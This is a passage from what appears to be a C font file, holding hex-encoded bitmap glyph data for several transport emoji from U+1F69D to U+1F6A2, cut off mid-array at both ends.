0xff, 0xe0, 0xfb, 0xfc, 0x3f, 0xe0, 0xc1, 0xc0,
0x3e, 0xf, 0xff, 0x7, 0xdf, 0xe1, 0xff, 0x87,
0x8e, 0x1, 0xf0, 0x7f, 0xf8, 0x3e, 0xff, 0xf,
0xfc, 0x3c, 0x70, 0x3, 0x83, 0xff, 0xc1, 0xc7,
0xf8, 0x7f, 0xe1, 0xe3, 0x80, 0x1c, 0xf, 0xfc,
0xe, 0x7, 0xc3, 0xfe, 0xe, 0x1c, 0x0, 0x70,
0x7f, 0xe0, 0xe0, 0xe, 0xf, 0xf0, 0x7f, 0xff,
0xff, 0x80, 0xfc, 0x7, 0x0, 0x70, 0x1e, 0x7,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x3c, 0x7, 0xc0,
0x0, 0x3c, 0x0, 0x1, 0xf0, 0x0, 0x3, 0xe0,
0x3f, 0x0, 0x3, 0xe0, 0x0, 0x7, 0xc0, 0x0,
0x3f, 0x0, 0xfc, 0x0, 0x3e, 0x0, 0x0, 0xf,
0x0, 0x3, 0x90, 0x2, 0xf0, 0x3, 0xf0, 0x0,
0x0, 0x3c, 0x0, 0x3c, 0x0, 0x3, 0xe0, 0x7c,
0x0, 0x0, 0x0, 0xfc, 0xf, 0xc0, 0x0, 0x1f,
0xff, 0xe0, 0x0, 0x0, 0x7, 0xff, 0xfe, 0x0,
0x0, 0xff, 0xff, 0x0, 0x0, 0x0, 0x3f, 0xff,
0xf0, 0x0, 0x3, 0x1e, 0x30, 0x0, 0x0, 0x0,
0x43, 0xc2, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0,
/* U+1F69D "🚝" */
0x0, 0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80, 0x0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x3f, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x3f, 0xfe, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x1c, 0x6, 0xf, 0xff, 0xff, 0xff,
0xff, 0x0, 0x1c, 0x6, 0xf, 0xff, 0xff, 0xff,
0xff, 0x80, 0x1c, 0x6, 0xc, 0xc0, 0xc, 0x0,
0xc1, 0xc0, 0xe, 0x6, 0xc, 0x60, 0x6, 0x0,
0x60, 0xe0, 0xe, 0x6, 0xc, 0x30, 0x3, 0x0,
0x30, 0x70, 0x7, 0x3, 0xe, 0x18, 0x1, 0x80,
0x18, 0x38, 0x7, 0x3, 0x6, 0xc, 0x0, 0xc0,
0xc, 0x1c, 0x3, 0x83, 0x6, 0x6, 0x0, 0x60,
0x6, 0xe, 0x3, 0x83, 0x87, 0x3, 0x0, 0x30,
0x3, 0x7, 0x1, 0xc1, 0x83, 0x1, 0x80, 0x18,
0x1, 0x83, 0x81, 0xc3, 0x83, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc0, 0xff, 0x81, 0xff, 0xff, 0xff,
0xff, 0xff, 0xe0, 0x79, 0xc0, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xf0, 0x7c, 0xc0, 0x3f, 0x80, 0x0,
0x0, 0x0, 0x38, 0x3f, 0x80, 0x3f, 0xc0, 0x0,
0x0, 0x0, 0x1c, 0x1c, 0x0, 0x3f, 0xe0, 0x0,
0x0, 0x0, 0xe, 0xe, 0x0, 0x7f, 0xfc, 0x0,
0x0, 0x0, 0x7, 0x7, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x83, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xc1, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf0, 0xf, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x38, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x7, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x1, 0xc0, 0x0, 0x0, 0xe0, 0x0, 0x7f, 0x80,
0x1, 0xc0, 0x0, 0x0, 0x70, 0x0, 0x3d, 0xe0,
0x1, 0xc0, 0x0, 0x0, 0x1c, 0x0, 0x3c, 0x78,
0x1, 0xe0, 0x0, 0x0, 0x7, 0x0, 0x3c, 0x1e,
0x1, 0xe0, 0x0, 0x0, 0x3, 0xc0, 0x3c, 0x7,
0x0, 0xe0, 0x0, 0x0, 0x0, 0xe0, 0x1c, 0x3,
0x80, 0x70, 0x0, 0x0, 0x0, 0x70, 0xe, 0x1,
0xc0, 0x38, 0x0, 0x0, 0x0, 0x38, 0x7, 0x0,
0xe0, 0x1c, 0x0, 0x0, 0x0, 0x1c, 0x3, 0x80,
0x70, 0xe, 0x0, 0x0, 0x0, 0xe, 0x1, 0xc0,
0x3f, 0xff, 0x0, 0x0, 0x0, 0x7, 0xff, 0xe0,
0x1f, 0xff, 0x80, 0x0, 0x0, 0x3, 0xff, 0xf0,
/* U+1F69E "🚞" */
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0xf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xc7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x39, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x6, 0xe0, 0xf, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1, 0xb8, 0xf, 0xf8, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7e, 0xf, 0x7, 0x0, 0x0, 0x0, 0xf,
0x80, 0x1f, 0x87, 0x80, 0xe0, 0x0, 0x0, 0x7,
0xf0, 0x7, 0xe7, 0x80, 0x1c, 0x0, 0x0, 0x3,
0xff, 0x1, 0xfb, 0xc0, 0x3, 0xfc, 0x0, 0x1,
0xe3, 0xe0, 0x7f, 0xe0, 0x0, 0x7f, 0xe0, 0x0,
0xf0, 0x3c, 0x1f, 0xe0, 0x0, 0x0, 0x7c, 0x3,
0xf8, 0x7, 0x87, 0xf0, 0x0, 0x0, 0x7, 0x87,
0xfc, 0x0, 0xf1, 0xf8, 0x0, 0x0, 0x0, 0x7f,
0xfc, 0x0, 0x1c, 0x7e, 0x0, 0x0, 0x0, 0xf,
0xe0, 0x0, 0x3, 0xff, 0x80, 0x0, 0x0, 0x1,
0xc0, 0x0, 0x0, 0x7f, 0xe0, 0x0, 0x0, 0x0,
0x38, 0x0, 0x0, 0x3, 0xf8, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xe0, 0x7e, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x1f, 0x87, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x87, 0xe3, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf1, 0xf8, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1c, 0x7e, 0x38, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x1f, 0x8e, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xe3, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf8, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x7e, 0x38,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x1f, 0x8e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc7, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x71, 0xf8,
0xe3, 0xfe, 0x7f, 0xcf, 0xf9, 0xff, 0x1c, 0x7e,
0x38, 0xff, 0x9f, 0xf3, 0xfe, 0x7f, 0xc7, 0x1f,
0x8e, 0x30, 0x66, 0xc, 0xc1, 0x98, 0x31, 0xc7,
0xe3, 0x8c, 0x19, 0x83, 0x30, 0x66, 0xc, 0x71,
0xf8, 0xe3, 0x6, 0x60, 0xcc, 0x19, 0x83, 0x1c,
0x7e, 0x38, 0xc1, 0x98, 0x33, 0x6, 0x60, 0xc7,
0x1f, 0x8e, 0x30, 0x66, 0xc, 0xc1, 0x98, 0x31,
0xc7, 0xe3, 0x8f, 0xf9, 0xff, 0x3f, 0xe7, 0xfc,
0x71, 0xf8, 0xe3, 0xfe, 0x7f, 0xcf, 0xf9, 0xff,
0x1c, 0x7e, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x1f, 0x8e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc7, 0xe3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x71, 0xf8, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x7e, 0x3f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0x1f, 0x8f, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xc7, 0xe3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x71, 0xf8, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x7e, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0x1f, 0x8e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc7, 0xe3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x71, 0xf8, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x7e, 0x3f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1f, 0x9f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe7, 0xe7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xf9, 0xf8, 0xc, 0x31,
0x86, 0x1, 0x86, 0x30, 0xc0, 0x7e, 0x3, 0x8c,
0x71, 0x80, 0x63, 0x8c, 0x70, 0x1f, 0x80, 0x7e,
0xf, 0xc0, 0xf, 0xc1, 0xf8, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0xfc, 0x3f, 0xf, 0xc3, 0xf0, 0xfc, 0x3f, 0xfc,
0x3f, 0xf, 0xc3, 0xf0, 0xfc, 0x3f, 0xf, 0xdf,
0xf, 0xc3, 0xf0, 0xfc, 0x3f, 0xf, 0xc3, 0xe7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0,
/* U+1F69F "🚟" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf0, 0x0, 0x0, 0xe, 0xe0, 0x0, 0x0,
0x1f, 0xff, 0x0, 0x0, 0x3, 0x8e, 0x0, 0x0,
0x7, 0xfe, 0xf0, 0x0, 0x0, 0xe0, 0xe0, 0x0,
0x1, 0xef, 0xcf, 0x0, 0x0, 0x3c, 0xe, 0x0,
0x0, 0x79, 0xf8, 0xf0, 0x0, 0xf, 0x0, 0xe0,
0x0, 0x1e, 0x3f, 0xf, 0xe0, 0x7d, 0xc0, 0x1f,
0xf0, 0x3f, 0x87, 0xe0, 0xff, 0x1f, 0xf0, 0x1,
0xff, 0x1f, 0xe0, 0xfc, 0x3f, 0xf7, 0xfc, 0x0,
0x1f, 0xf3, 0xfc, 0x1f, 0x8f, 0x1f, 0xf3, 0xc0,
0x7, 0x9f, 0xf1, 0xc3, 0xf1, 0xcf, 0xff, 0x38,
0x0, 0xe7, 0xff, 0x98, 0x7e, 0x39, 0xff, 0xf3,
0x0, 0x1c, 0xff, 0xf3, 0xf, 0xc7, 0x27, 0xe4,
0xe0, 0x3, 0x93, 0xf2, 0xe1, 0xf8, 0xf1, 0xfe,
0x3c, 0x0, 0x78, 0xff, 0x1c, 0x3f, 0xf, 0xff,
0xff, 0x0, 0x7, 0xff, 0xff, 0x7, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf0,
0x0, 0xf0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x7e,
0x0, 0x1e, 0x0, 0x0, 0x0, 0xf, 0x0, 0xf,
0xc0, 0x3, 0xc0, 0x0, 0x0, 0x1, 0xe0, 0x1,
0xf8, 0x0, 0x78, 0x0, 0x0, 0x0, 0x3c, 0x0,
0x3f, 0x0, 0xf, 0x0, 0x0, 0x0, 0x7, 0x80,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x0, 0x7, 0x80, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x3, 0xc0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xf8, 0x0, 0x1f, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0x80, 0xf, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xfe, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xe1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0x7f, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfc,
0x0, 0x0, 0x0, 0x1, 0xfc, 0x0, 0x0, 0x1f,
0x83, 0xfc, 0x3f, 0xe0, 0xff, 0xe0, 0x7f, 0x83,
0xf0, 0x7f, 0x87, 0xfc, 0x1c, 0xe, 0xf, 0xf0,
0x7e, 0xc, 0x30, 0xc1, 0x87, 0x0, 0xc1, 0x86,
0xf, 0xc1, 0x86, 0x18, 0x30, 0xc0, 0x18, 0x30,
0xc1, 0xf8, 0x30, 0xc3, 0x6, 0x18, 0x3, 0x6,
0x18, 0x3f, 0x6, 0x18, 0x60, 0xc3, 0x1e, 0x60,
0xc3, 0x7, 0xe0, 0xc3, 0xc, 0x18, 0x63, 0xcc,
0x18, 0x60, 0xfc, 0x18, 0x61, 0x83, 0xc, 0x79,
0x83, 0xc, 0x1f, 0x83, 0xc, 0x30, 0x61, 0x8f,
0x30, 0x61, 0x83, 0xf0, 0x7f, 0x87, 0xfc, 0x31,
0xe6, 0xf, 0xf0, 0x7e, 0x0, 0x0, 0x0, 0x6,
0x3c, 0xc0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x0,
0xc7, 0x98, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x18, 0x3, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x3, 0x0, 0x60, 0x0, 0x7, 0xff, 0xff, 0xff,
0xff, 0xe0, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xfc, 0x1, 0xff, 0xff, 0xff, 0x80, 0x0,
0x0, 0x1, 0x80, 0x30, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x30, 0x6, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x6, 0x0, 0xc0, 0x0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0xc0, 0x18, 0x0, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfb,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x80,
/* U+1F6A0 "🚠" */
0xc0, 0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7e, 0x0, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xf0, 0x3f, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xdf, 0xff, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xff, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x77, 0xff, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0xfe, 0x7f, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7e, 0x1c, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3f, 0x0, 0x3f,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80, 0x0,
0x3f, 0xf0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0xff, 0x0, 0x0, 0x0, 0x7, 0xe0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xfc, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xf8,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xfc,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xfe,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xff,
0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x1f, 0xff, 0xff,
0xff, 0xff, 0xfe, 0x0, 0x1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xf8, 0x3, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x1, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0x81, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xe0, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x70, 0x70, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x38, 0x38, 0x0, 0xf,
0xff, 0xff, 0xf0, 0x0, 0x1c, 0x1c, 0x0, 0x7,
0xff, 0xff, 0xf8, 0x0, 0xe, 0xf, 0xff, 0xc3,
0xff, 0xff, 0xfc, 0x3f, 0xff, 0x7, 0xff, 0xe1,
0xc0, 0x30, 0xe, 0x1f, 0xff, 0x83, 0x80, 0x30,
0xe0, 0x18, 0x7, 0xc, 0x1, 0xc1, 0xc0, 0x18,
0x70, 0xc, 0x3, 0x86, 0x0, 0xe0, 0xe0, 0xc,
0x38, 0x6, 0x1, 0xc3, 0x0, 0x70, 0x70, 0x6,
0x1c, 0x3, 0x0, 0xe1, 0x80, 0x38, 0x38, 0x3,
0xe, 0x1, 0x80, 0x70, 0xc0, 0x1c, 0x1c, 0x1,
0x87, 0x0, 0xc0, 0x38, 0x60, 0xe, 0xe, 0x0,
0xc3, 0x80, 0x60, 0x1c, 0x30, 0x7, 0x7, 0x0,
0x61, 0xc0, 0x30, 0xe, 0x18, 0x3, 0x83, 0x80,
0x30, 0xe0, 0x18, 0x7, 0xc, 0x1, 0xc1, 0xc0,
0x18, 0x70, 0xc, 0x3, 0x86, 0x0, 0xe0, 0xe0,
0xc, 0x38, 0x6, 0x1, 0xc3, 0x0, 0x70, 0x7f,
0xfe, 0x1c, 0x3, 0x0, 0xe1, 0xff, 0xf8, 0x3f,
0xff, 0xe, 0x1, 0x80, 0x70, 0xff, 0xfc, 0xc,
0x0, 0x7, 0x0, 0xc0, 0x38, 0x0, 0xc, 0x7,
0x0, 0x3, 0x80, 0x60, 0x1c, 0x0, 0xe, 0x3,
0x80, 0x1, 0xc0, 0x30, 0xe, 0x0, 0x7, 0x0,
0xe0, 0x0, 0xe0, 0x18, 0x7, 0x0, 0x7, 0x0,
0x38, 0x0, 0x70, 0xc, 0x3, 0x80, 0x7, 0x0,
0x1f, 0x0, 0x38, 0x6, 0x1, 0xc0, 0xf, 0x80,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x0,
0x0,
/* U+1F6A1 "🚡" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf8, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0x81, 0xff, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xfd, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0,
0x0, 0xff, 0xff, 0xff, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xff, 0xff, 0xc0, 0x0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7b, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x1, 0xdf, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0xf, 0xef, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xc3, 0xff, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x40, 0xf, 0xff, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x3f, 0xf8,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x3, 0xff,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x1f,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xf0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0xff, 0xff, 0x80, 0x0,
0x0, 0x0, 0x7f, 0xff, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x60, 0x0,
0x0, 0x0, 0xe0, 0x7, 0xfe, 0x0, 0x60, 0x0,
0x0, 0x0, 0xe0, 0x7, 0xfe, 0x0, 0x60, 0x0,
0x0, 0x0, 0xff, 0x87, 0xfe, 0x1f, 0xe0, 0x0,
0x0, 0x0, 0xff, 0x86, 0x6, 0x1f, 0xe0, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xe1, 0x86, 0x6, 0x18, 0x60, 0x0,
0x0, 0x0, 0xff, 0x86, 0x6, 0x1f, 0xe0, 0x0,
0x0, 0x0, 0xff, 0x86, 0x6, 0x1f, 0xe0, 0x0,
0x0, 0x0, 0xe0, 0x6, 0x6, 0x0, 0xe0, 0x0,
0x0, 0x0, 0x60, 0x6, 0x6, 0x0, 0xc0, 0x0,
0x0, 0x0, 0x70, 0x6, 0x6, 0x0, 0xc0, 0x0,
0x0, 0x0, 0x38, 0x6, 0x6, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x3c, 0x6, 0x6, 0x3, 0x80, 0x0,
0x0, 0x0, 0x1f, 0x6, 0x6, 0xf, 0x0, 0x0,
0x0, 0x0, 0xf, 0xff, 0xff, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x3, 0xff, 0xff, 0xf8, 0x0, 0x0,
/* U+1F6A2 "🚢" */
0x0, 0x0, 0x0, 0x7, 0xf8, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x60, 0xe0,
